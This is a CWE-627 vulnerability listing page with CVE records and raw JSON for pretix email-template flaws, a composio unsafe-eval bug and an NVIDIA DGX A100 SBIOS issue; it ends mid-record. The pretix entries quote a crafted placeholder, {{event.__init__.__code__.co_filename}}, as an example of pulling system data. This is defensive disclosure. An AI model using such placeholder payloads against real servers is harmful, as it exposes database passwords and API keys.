Common Weakness Enumeration

CWE-627

Allowed

Dynamic Variable Evaluation

Abstraction: Variant · Status: Incomplete

In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.

12 vulnerabilities reference this CWE, most recent first.

CVE-2026-2452 (GCVE-0-2026-2452)

Vulnerability from cvelistv5 – Published: 2026-02-16 10:16 – Updated: 2026-02-17 17:06
VLAI
Title
Unsafe variable evaluation in email templates
Summary
Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for this plugin. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-627 - Dynamic Variable Evaluation
Assigner
References
Impacted products
Vendor Product Version
pretix pretix-newsletter Affected: 1.0.0 , < 2.0.0 (python)
Affected: 2.0.0 , < 2.0.1 (python)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2452",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-17T16:43:10.295791Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-17T17:06:21.998Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://marketplace.pretix.eu/",
          "defaultStatus": "unaffected",
          "packageName": "pretix-newsletter",
          "product": "pretix-newsletter",
          "vendor": "pretix",
          "versions": [
            {
              "changes": [
                {
                  "at": "1.6.3",
                  "status": "unaffected"
                }
              ],
              "lessThan": "2.0.0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "python"
            },
            {
              "lessThan": "2.0.1",
              "status": "affected",
              "version": "2.0.0",
              "versionType": "python"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eEmails sent by pretix can utilize placeholders that will be filled with customer data. For example, when \u003ccode\u003e{name}\u003c/code\u003e\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained a security-relevant bug:\u003c/p\u003e\u003cp\u003eIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as \u003ccode\u003e{{event.__init__.__code__.co_filename}}\u003c/code\u003e.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for this plugin.\u003c/p\u003e\u003cp\u003eOut of caution, we recommend that you rotate all passwords and API keys contained in your \u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://docs.pretix.eu/self-hosting/config/\"\u003epretix.cfg\u003c/a\u003e\u0026nbsp;file.\u003cbr\u003e\u003c/p\u003e"
            }
          ],
          "value": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained a security-relevant bug:\n\nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for this plugin.\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your  pretix.cfg https://docs.pretix.eu/self-hosting/config/ \u00a0file."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-545",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-545 Pull Data from System Resources"
            }
          ]
        },
        {
          "capecId": "CAPEC-77",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-77 Manipulating User-Controlled Variables"
            }
          ]
        },
        {
          "capecId": "CAPEC-54",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-54 Query System for Information"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "privilegesRequired": "LOW",
            "providerUrgency": "RED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "LOW"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-627",
              "description": "CWE-627 Dynamic Variable Evaluation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-16T10:16:22.027Z",
        "orgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
        "shortName": "rami.io"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1/"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Unsafe variable evaluation in email templates",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Limit backend access to trusted users, do not use user-controlled variables in the email templates."
            }
          ],
          "value": "Limit backend access to trusted users, do not use user-controlled variables in the email templates."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
    "assignerShortName": "rami.io",
    "cveId": "CVE-2026-2452",
    "datePublished": "2026-02-16T10:16:22.027Z",
    "dateReserved": "2026-02-13T09:57:35.371Z",
    "dateUpdated": "2026-02-17T17:06:21.998Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-2451 (GCVE-0-2026-2451)

Vulnerability from cvelistv5 – Published: 2026-02-16 10:16 – Updated: 2026-02-17 17:06
VLAI
Title
Unsafe variable evaluation in email templates
Summary
Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for this plugin. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg file.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-627 - Dynamic Variable Evaluation
Assigner
References
Impacted products
Vendor Product Version
pretix pretix-doistep Affected: 1.0.0 , < 1.3.2 (python)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2451",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-17T16:43:11.539670Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-17T17:06:30.536Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://marketplace.pretix.eu/",
          "defaultStatus": "unaffected",
          "packageName": "pretix-doistep",
          "product": "pretix-doistep",
          "vendor": "pretix",
          "versions": [
            {
              "lessThan": "1.3.2",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "python"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eEmails sent by pretix can utilize placeholders that will be filled with customer data. For example, when \u003ccode\u003e{name}\u003c/code\u003e\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained a security-relevant bug:\u003c/p\u003e\u003cp\u003eIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as \u003ccode\u003e{{event.__init__.__code__.co_filename}}\u003c/code\u003e.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for this plugin.\u003c/p\u003e\u003cp\u003eOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg\u0026nbsp;file.\u003cbr\u003e\u003c/p\u003e"
            }
          ],
          "value": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained a security-relevant bug:\n\nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for this plugin.\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg\u00a0file."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-545",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-545 Pull Data from System Resources"
            }
          ]
        },
        {
          "capecId": "CAPEC-77",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-77 Manipulating User-Controlled Variables"
            }
          ]
        },
        {
          "capecId": "CAPEC-54",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-54 Query System for Information"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "privilegesRequired": "LOW",
            "providerUrgency": "RED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "LOW"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-627",
              "description": "CWE-627 Dynamic Variable Evaluation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-16T10:16:05.423Z",
        "orgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
        "shortName": "rami.io"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1/"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Unsafe variable evaluation in email templates",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Limit backend access to trusted users, do not use user-controlled variables in the email templates."
            }
          ],
          "value": "Limit backend access to trusted users, do not use user-controlled variables in the email templates."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
    "assignerShortName": "rami.io",
    "cveId": "CVE-2026-2451",
    "datePublished": "2026-02-16T10:16:05.423Z",
    "dateReserved": "2026-02-13T09:57:34.221Z",
    "dateUpdated": "2026-02-17T17:06:30.536Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-2415 (GCVE-0-2026-2415)

Vulnerability from cvelistv5 – Published: 2026-02-16 10:15 – Updated: 2026-02-17 17:06
VLAI
Title
Unsafe variable evaluation in email templates
Summary
Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs: * It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject. * Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is {invoice_company}, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. However, we also consider this scenario very unlikely under typical conditions. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-627 - Dynamic Variable Evaluation
Assigner
References
Impacted products
Vendor Product Version
pretix pretix Affected: 4.16.0 , < 2025.9.0 (python)
Affected: 2025.9.0 , < 2025.10.0 (python)
Affected: 2025.10.0 , < 2026.1.0 (python)
Affected: 2026.1.0 , < 2026.1.1 (python)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2415",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-17T16:43:12.852157Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-17T17:06:39.418Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://pypi.org/",
          "defaultStatus": "unaffected",
          "packageName": "pretix",
          "product": "pretix",
          "repo": "https://github.com/pretix/pretix",
          "vendor": "pretix",
          "versions": [
            {
              "lessThan": "2025.9.0",
              "status": "affected",
              "version": "4.16.0",
              "versionType": "python"
            },
            {
              "changes": [
                {
                  "at": "2025.9.4",
                  "status": "unaffected"
                }
              ],
              "lessThan": "2025.10.0",
              "status": "affected",
              "version": "2025.9.0",
              "versionType": "python"
            },
            {
              "changes": [
                {
                  "at": "2025.10.2",
                  "status": "unaffected"
                }
              ],
              "lessThan": "2026.1.0",
              "status": "affected",
              "version": "2025.10.0",
              "versionType": "python"
            },
            {
              "lessThan": "2026.1.1",
              "status": "affected",
              "version": "2026.1.0",
              "versionType": "python"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eEmails sent by pretix can utilize placeholders that will be filled with customer data. For example, when \u003ccode\u003e{name}\u003c/code\u003e\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained two security-relevant\n bugs:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as \u003ccode\u003e{{event.__init__.__code__.co_filename}}\u003c/code\u003e.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is \u003ccode\u003e{invoice_company}\u003c/code\u003e, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. However, we also consider this scenario \nvery unlikely under typical conditions.\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cdiv\u003eOut of caution, we recommend that you rotate all passwords and API keys contained in your \u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://docs.pretix.eu/self-hosting/config/\"\u003epretix.cfg\u003c/a\u003e\u0026nbsp;file.\u003cbr\u003e\u003c/div\u003e"
            }
          ],
          "value": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will  be replaced with the buyer\u0027s \nname for the final email. This mechanism contained two security-relevant\n bugs:\n\n\n\n  *  \nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\n\n\n\n\n  *  \nPlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is {invoice_company}, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. However, we also consider this scenario \nvery unlikely under typical conditions.\n\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your  pretix.cfg https://docs.pretix.eu/self-hosting/config/ \u00a0file."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-545",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-545 Pull Data from System Resources"
            }
          ]
        },
        {
          "capecId": "CAPEC-77",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-77 Manipulating User-Controlled Variables"
            }
          ]
        },
        {
          "capecId": "CAPEC-54",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-54 Query System for Information"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "privilegesRequired": "LOW",
            "providerUrgency": "RED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "LOW"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-627",
              "description": "CWE-627 Dynamic Variable Evaluation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-16T10:15:09.149Z",
        "orgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
        "shortName": "rami.io"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1/"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Unsafe variable evaluation in email templates",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Limit backend access to trusted users, do not use user-controlled variables in the email template subjects."
            }
          ],
          "value": "Limit backend access to trusted users, do not use user-controlled variables in the email template subjects."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "655498c3-6ec5-4f0b-aea6-853b334d05a6",
    "assignerShortName": "rami.io",
    "cveId": "CVE-2026-2415",
    "datePublished": "2026-02-16T10:15:09.149Z",
    "dateReserved": "2026-02-12T17:02:46.966Z",
    "dateUpdated": "2026-02-17T17:06:39.418Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-8953 (GCVE-0-2024-8953)

Vulnerability from cvelistv5 – Published: 2025-03-20 10:10 – Updated: 2025-03-20 18:10
VLAI
Title
Unsafe eval usage in composiohq/composio
Summary
In composiohq/composio version 0.4.3, the mathematical_calculator endpoint uses the unsafe eval() function to perform mathematical operations. This can lead to arbitrary code execution if untrusted input is passed to the eval() function.
SSVC
Exploitation: poc Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-627 - Dynamic Variable Evaluation
Assigner
Impacted products
Vendor Product Version
composiohq composiohq/composio Affected: unspecified , ≤ latest (custom)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-8953",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-20T18:10:08.777486Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-20T18:10:22.095Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://huntr.com/bounties/8203d721-e05f-4500-a5bc-c0bec980420c"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "composiohq/composio",
          "vendor": "composiohq",
          "versions": [
            {
              "lessThanOrEqual": "latest",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In composiohq/composio version 0.4.3, the mathematical_calculator endpoint uses the unsafe eval() function to perform mathematical operations. This can lead to arbitrary code execution if untrusted input is passed to the eval() function."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-627",
              "description": "CWE-627 Dynamic Variable Evaluation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-20T10:10:56.507Z",
        "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
        "shortName": "@huntr_ai"
      },
      "references": [
        {
          "url": "https://huntr.com/bounties/8203d721-e05f-4500-a5bc-c0bec980420c"
        }
      ],
      "source": {
        "advisory": "8203d721-e05f-4500-a5bc-c0bec980420c",
        "discovery": "EXTERNAL"
      },
      "title": "Unsafe eval usage in composiohq/composio"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
    "assignerShortName": "@huntr_ai",
    "cveId": "CVE-2024-8953",
    "datePublished": "2025-03-20T10:10:56.507Z",
    "dateReserved": "2024-09-17T17:04:18.929Z",
    "dateUpdated": "2025-03-20T18:10:22.095Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-31032 (GCVE-0-2023-31032)

Vulnerability from cvelistv5 – Published: 2024-01-12 18:31 – Updated: 2025-06-03 14:04
VLAI
Title
CVE
Summary
NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
Impacted products
Vendor Product Version
nvidia DGX A100 Affected: All SBOIS versions prior to 1.25
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T14:45:24.989Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5510"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-31032",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-08T15:47:24.775962Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-06-03T14:04:20.919Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "DGX A100",
          "vendor": "nvidia",
          "versions": [
            {
              "status": "affected",
              "version": "All SBOIS versions prior to 1.25"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": true,
              "type": "text/html",
              "value": "NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service."
            }
          ],
          "value": "NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service."
        }
      ],
      "impacts": [
        {
          "descriptions": [
            {
              "lang": "en",
              "value": "Denial of service"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-627",
              "description": "CWE-627",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-12T18:31:36.994Z",
        "orgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
        "shortName": "nvidia"
      },
      "references": [
        {
          "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5510"
        }
      ],
      "source": {
